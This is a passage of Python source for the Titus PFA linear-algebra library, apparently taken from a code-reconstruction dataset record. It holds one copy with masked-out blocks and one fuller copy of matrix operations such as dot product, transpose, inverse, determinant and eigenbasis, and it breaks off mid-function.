P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Double())}], P.Array(P.Double())), Sig([{'x': P.Map(P.Map(P.Double(\n )))}, {'y': P.Map(P.Double())}], P.Map(P.Double())), Sig([{'x': P.\n Array(P.Array(P.Double()))}, {'y': P.Array(P.Array(P.Double()))}],\n P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))},\n {'y': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24050\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if paramTypes[1]['type'] == 'array':\n if isinstance(paramTypes[1]['items'], dict) and paramTypes[1][\n 'items']['type'] == 'array':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(any(math.isnan(z) or math.isinf(z) for\n z in row) for row in y)\n xmat = arraysToMatrix(x)\n ymat = arraysToMatrix(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return matrixToArrays(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(math.isnan(z) or math.isinf(z) for z in y)\n xmat = arraysToMatrix(x)\n ymat = arrayToRowVector(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return rowVectorToArray(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n elif paramTypes[1]['type'] == 'map':\n if isinstance(paramTypes[1]['values'], dict) and paramTypes[1][\n 'values']['type'] == 'map':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(any(\n math.isnan(z) or math.isinf(z) for z in list(row.values\n ())) for row in list(y.values()))\n rows = list(rowKeys(x))\n inter = list(colKeys(x).union(rowKeys(y)))\n cols = list(colKeys(y))\n xmat = mapsToMatrix(x, rows, inter)\n ymat = mapsToMatrix(y, inter, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return matrixToMaps(np().dot(xmat, ymat), rows, cols)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(math\n .isnan(z) or math.isinf(z) for z in list(y.values()))\n rows = list(rowKeys(x))\n cols = list(colKeys(x).union(rowKeys(y)))\n xmat = mapsToMatrix(x, rows, cols)\n ymat = mapToRowVector(y, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return rowVectorToMap(np().dot(xmat, ymat), rows)\n\n\n<mask token>\n\n\nclass Transpose(LibFcn):\n name = prefix + 'transpose'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24060\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return [[x[r][c] for r in range(rows)] for c in range(cols)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedMap(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return dict((c, dict((r, x[r][c]) for r in rows)) for c in cols)\n\n\n<mask token>\n\n\nclass Inverse(LibFcn):\n name = prefix + 'inverse'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24070\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return matrixToArrays(arraysToMatrix(x).I)\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = list(rowKeys(x))\n cols = list(colKeys(x))\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n xmat = mapsToMatrix(x, rows, cols)\n return matrixToMaps(xmat.I, cols, rows)\n\n\n<mask token>\n\n\nclass Trace(LibFcn):\n name = prefix + 'trace'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24080\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows == 0:\n return 0.0\n else:\n cols = len(x[0])\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 0, self.name, pos)\n return sum(x[i][i] for i in range(min(rows, cols)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = rowKeys(x).intersection(colKeys(x))\n return sum(x[i][i] for i in keys)\n\n\n<mask token>\n\n\nclass Det(LibFcn):\n name = prefix + 'det'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24090\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n return float('nan')\n else:\n return float(np().linalg.det(arraysToMatrix(x)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n return float('nan')\n else:\n return float(np().linalg.det(mapsToMatrix(x, keys, keys)))\n\n\n<mask token>\n\n\nclass Symmetric(LibFcn):\n name = prefix + 'symmetric'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'tol': P.Double(\n )}], P.Boolean()), Sig([{'x': P.Map(P.Map(P.Double()))}, {'tol': P.\n Double()}], P.Boolean())])\n errcodeBase = 24100\n\n @staticmethod\n def same(x, y, tol):\n if math.isinf(x) and math.isinf(y) and (x > 0.0 and y > 0.0 or x < \n 0.0 and y < 0.0):\n return True\n elif math.isnan(x) and math.isnan(y):\n return True\n elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y\n ) and not math.isnan(y):\n return abs(x - y) < tol\n else:\n return False\n\n def __call__(self, state, scope, pos, paramTypes, x, tol):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n return all(all(self.same(x[i][j], x[j][i], tol) for j in range(\n cols)) for i in range(rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {})\n .get(i, 0.0), tol) for j in keys) for i in keys)\n\n\n<mask token>\n\n\nclass EigenBasis(LibFcn):\n name = prefix + 'eigenBasis'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24110\n\n def calculate(self, x, size):\n symm = (x + x.T) * 0.5\n evals, evects = np().linalg.eig(symm)\n evects = np().array(evects)\n evects2 = [(evects[:, i] * (-1.0 if evects[0, i] < 0.0 else 1.0)) for\n i in range(size)]\n eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]\n order = np().argsort(eigvalm2)\n out = np().empty((size, size), dtype=np().double)\n for i in range(size):\n for j in range(size):\n out[i, j] = evects2[order[i]][j] * eigvalm2[order[i]]\n return out\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToArrays(self.calculate(arraysToMatrix(x), rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys),\n len(keys)), list(map(str, range(len(keys)))), keys)\n\n\n<mask token>\n\n\nclass Truncate(LibFcn):\n name = prefix + 'truncate'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'keep': P.Int()}\n ], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()\n ))}, {'keep': P.Array(P.String())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24120\n\n def __call__(self, state, scope, pos, paramTypes, x, keep):\n if isinstance(keep, int) and keep < 0:\n keep = 0\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return x[:keep]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return dict((k, x[k]) for k in rows if k in keep)\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python\n\n# Copyright (C) 2014 Open Data (\"Open Data\" refers to\n# one or more of the following companies: Open Data Partners LLC,\n# Open Data Research LLC, or Open Data Capital LLC.)\n# \n# This file is part of Hadrian.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport math\n\nfrom titus.fcn import Fcn\nfrom titus.fcn import LibFcn\nfrom titus.signature import Sig\nfrom titus.signature import Sigs\nfrom titus.datatype import *\nfrom titus.errors import *\nfrom titus.util import callfcn, div\nimport titus.P as P\nfrom functools import reduce\n\nprovides = {}\ndef provide(fcn):\n provides[fcn.name] = fcn\n\nprefix = \"la.\"\n\ndef np():\n import numpy\n return numpy\n\ndef rowKeys(x):\n return set(x.keys())\n\ndef colKeys(x):\n if len(x) == 0:\n return set()\n else:\n return reduce(lambda a, b: a.union(b), [set(xi.keys()) for xi in list(x.values())])\n\ndef arraysToMatrix(x):\n return np().matrix(x, dtype=np().double)\n\ndef arrayToRowVector(x):\n return np().matrix(x, dtype=np().double).T\n\ndef rowVectorToArray(x):\n return x.T.tolist()[0]\n\ndef matrixToArrays(x):\n return x.tolist()\n\ndef mapsToMatrix(x, rows, cols):\n return np().matrix([[x.get(i, {}).get(j, 0.0) for j in cols] for i in rows], dtype=np().double)\n\ndef mapToRowVector(x, keys):\n return np().matrix([x.get(k, 0.0) for k in keys], dtype=np().double).T\n\ndef rowVectorToMap(x, keys):\n return dict(list(zip(keys, x.T.tolist()[0])))\n\ndef matrixToMaps(x, rows, cols):\n return dict((row, dict(list(zip(cols, xi)))) for row, xi in zip(rows, x.tolist()))\n\ndef raggedArray(x):\n collens = list(map(len, x))\n return max(collens) != min(collens)\n\ndef raggedMap(x):\n return len(set(len(xi) for xi in list(x.values()))) != 1\n\nclass MapApply(LibFcn):\n name = prefix + \"map\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"fcn\": P.Fcn([P.Double()], P.Double())}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"fcn\": P.Fcn([P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24000\n def __call__(self, state, scope, pos, paramTypes, x, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n return [[callfcn(state, scope, fcn, [xj]) for xj in xi] for xi in x]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n return dict((i, dict((j, callfcn(state, scope, fcn, [xj])) for j, xj in list(xi.items()))) for i, xi in list(x.items()))\n\nprovide(MapApply())\n\nclass Scale(LibFcn):\n name = prefix + \"scale\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Double())}, {\"alpha\": P.Double()}], P.Array(P.Double())),\n Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"alpha\": P.Double()}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Double())}, {\"alpha\": P.Double()}], P.Map(P.Double())),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"alpha\": P.Double()}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24010\n def __call__(self, state, scope, pos, paramTypes, x, alpha):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n return [[xj * alpha for xj in xi] for xi in x]\n elif isinstance(x, (list, tuple)):\n return [xi * alpha for xi in x]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in x):\n return dict((i, dict((j, xj * alpha) for j, xj in list(xi.items()))) for i, xi in list(x.items()))\n else:\n return dict((i, xi * alpha) for i, xi in list(x.items()))\n\nprovide(Scale())\n\nclass ZipMap(LibFcn):\n name = prefix + \"zipmap\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"y\": P.Array(P.Array(P.Double()))}, {\"fcn\": P.Fcn([P.Double(), P.Double()], P.Double())}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"y\": P.Map(P.Map(P.Double()))}, {\"fcn\": P.Fcn([P.Double(), P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24020\n def __call__(self, state, scope, pos, paramTypes, x, y, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and \\\n isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n return [[callfcn(state, scope, fcn, [xj, yj]) for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \\\n isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, callfcn(state, scope, fcn, [x.get(i, {}).get(j, 0.0), y.get(i, {}).get(j, 0.0)])) for j in cols)) for i in rows)\n\nprovide(ZipMap())\n\nclass Add(LibFcn):\n name = prefix + \"add\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Double())}, {\"y\": P.Array(P.Double())}], P.Array(P.Double())),\n Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"y\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Double())}, {\"y\": P.Map(P.Double())}], P.Map(P.Double())),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"y\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24030\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and \\\n isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n return [[xj + yj for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]\n\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n return [xi + yi for xi, yi in zip(x, y)]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \\\n isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) + y.get(i, {}).get(j, 0.0)) for j in cols)) for i in rows)\n\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) + y.get(i, 0.0)) for i in rows)\n\nprovide(Add())\n\nclass Sub(LibFcn):\n name = prefix + \"sub\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Double())}, {\"y\": P.Array(P.Double())}], P.Array(P.Double())),\n Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"y\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Double())}, {\"y\": P.Map(P.Double())}], P.Map(P.Double())),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"y\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24040\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x) and \\\n isinstance(y, (list, tuple)) and all(isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip(x, y)):\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n return [[xj - yj for xj, yj in zip(xi, yi)] for xi, yi in zip(x, y)]\n\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n return [xi - yi for xi, yi in zip(x, y)]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())) and \\\n isinstance(y, dict) and all(isinstance(y[i], dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) - y.get(i, {}).get(j, 0.0)) for j in cols)) for i in rows)\n\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) - y.get(i, 0.0)) for i in rows)\n\nprovide(Sub())\n\nclass Dot(LibFcn):\n name = prefix + \"dot\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"y\": P.Array(P.Double())}], P.Array(P.Double())),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"y\": P.Map(P.Double())}], P.Map(P.Double())),\n Sig([{\"x\": P.Array(P.Array(P.Double()))}, {\"y\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}, {\"y\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24050\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if paramTypes[1][\"type\"] == \"array\":\n if isinstance(paramTypes[1][\"items\"], dict) and paramTypes[1][\"items\"][\"type\"] == \"array\":\n # array matrix-matrix case\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x) or \\\n any(any(math.isnan(z) or math.isinf(z) for z in row) for row in y)\n xmat = arraysToMatrix(x)\n ymat = arraysToMatrix(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 1, self.name, pos)\n try:\n if bad: raise PFARuntimeException(\"contains non-finite value\", self.errcodeBase + 2, self.name, pos)\n return matrixToArrays(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n\n else:\n # array matrix-vector case\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for row in x) or \\\n any(math.isnan(z) or math.isinf(z) for z in y)\n xmat = arraysToMatrix(x)\n ymat = arrayToRowVector(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 1, self.name, pos)\n try:\n if bad: raise PFARuntimeException(\"contains non-finite value\", self.errcodeBase + 2, self.name, pos)\n return rowVectorToArray(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException(\"misaligned matrices\", self.errcodeBase + 0, self.name, pos)\n\n elif paramTypes[1][\"type\"] == \"map\":\n if isinstance(paramTypes[1][\"values\"], dict) and paramTypes[1][\"values\"][\"type\"] == \"map\":\n # map matrix-matrix case\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())) or \\\n any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(y.values()))\n rows = list(rowKeys(x))\n inter = list(colKeys(x).union(rowKeys(y)))\n cols = list(colKeys(y))\n xmat = mapsToMatrix(x, rows, inter)\n ymat = mapsToMatrix(y, inter, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 1, self.name, pos)\n if bad: raise PFARuntimeException(\"contains non-finite value\", self.errcodeBase + 2, self.name, pos)\n return matrixToMaps(np().dot(xmat, ymat), rows, cols)\n\n else:\n # map matrix-vector case\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(row.values())) for row in list(x.values())) or \\\n any(math.isnan(z) or math.isinf(z) for z in list(y.values()))\n rows = list(rowKeys(x))\n cols = list(colKeys(x).union(rowKeys(y)))\n xmat = mapsToMatrix(x, rows, cols)\n ymat = mapToRowVector(y, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 1, self.name, pos)\n if bad: raise PFARuntimeException(\"contains non-finite value\", self.errcodeBase + 2, self.name, pos)\n return rowVectorToMap(np().dot(xmat, ymat), rows)\n\nprovide(Dot())\n \nclass Transpose(LibFcn):\n name = prefix + \"transpose\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24060\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n return [[x[r][c] for r in range(rows)] for c in range(cols)]\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedMap(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n return dict((c, dict((r, x[r][c]) for r in rows)) for c in cols)\n\nprovide(Transpose())\n\nclass Inverse(LibFcn):\n name = prefix + \"inverse\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24070\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 1, self.name, pos)\n return matrixToArrays(arraysToMatrix(x).I)\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n rows = list(rowKeys(x))\n cols = list(colKeys(x))\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException(\"too few rows/cols\", self.errcodeBase + 0, self.name, pos)\n xmat = mapsToMatrix(x, rows, cols)\n return matrixToMaps(xmat.I, cols, rows)\n\nprovide(Inverse())\n\nclass Trace(LibFcn):\n name = prefix + \"trace\"\n sig = Sigs([Sig([{\"x\": P.Array(P.Array(P.Double()))}], P.Double()),\n Sig([{\"x\": P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24080\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple)) for xi in x):\n rows = len(x)\n if rows == 0:\n return 0.0\n else:\n cols = len(x[0])\n if raggedArray(x):\n raise PFARuntimeException(\"ragged columns\", self.errcodeBase + 0, self.name, pos)\n return sum(x[i][i] for i in range(min(rows, cols)))\n\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in list(x.keys())):\n keys = rowKeys(x).intersection(colKeys(x))\n return 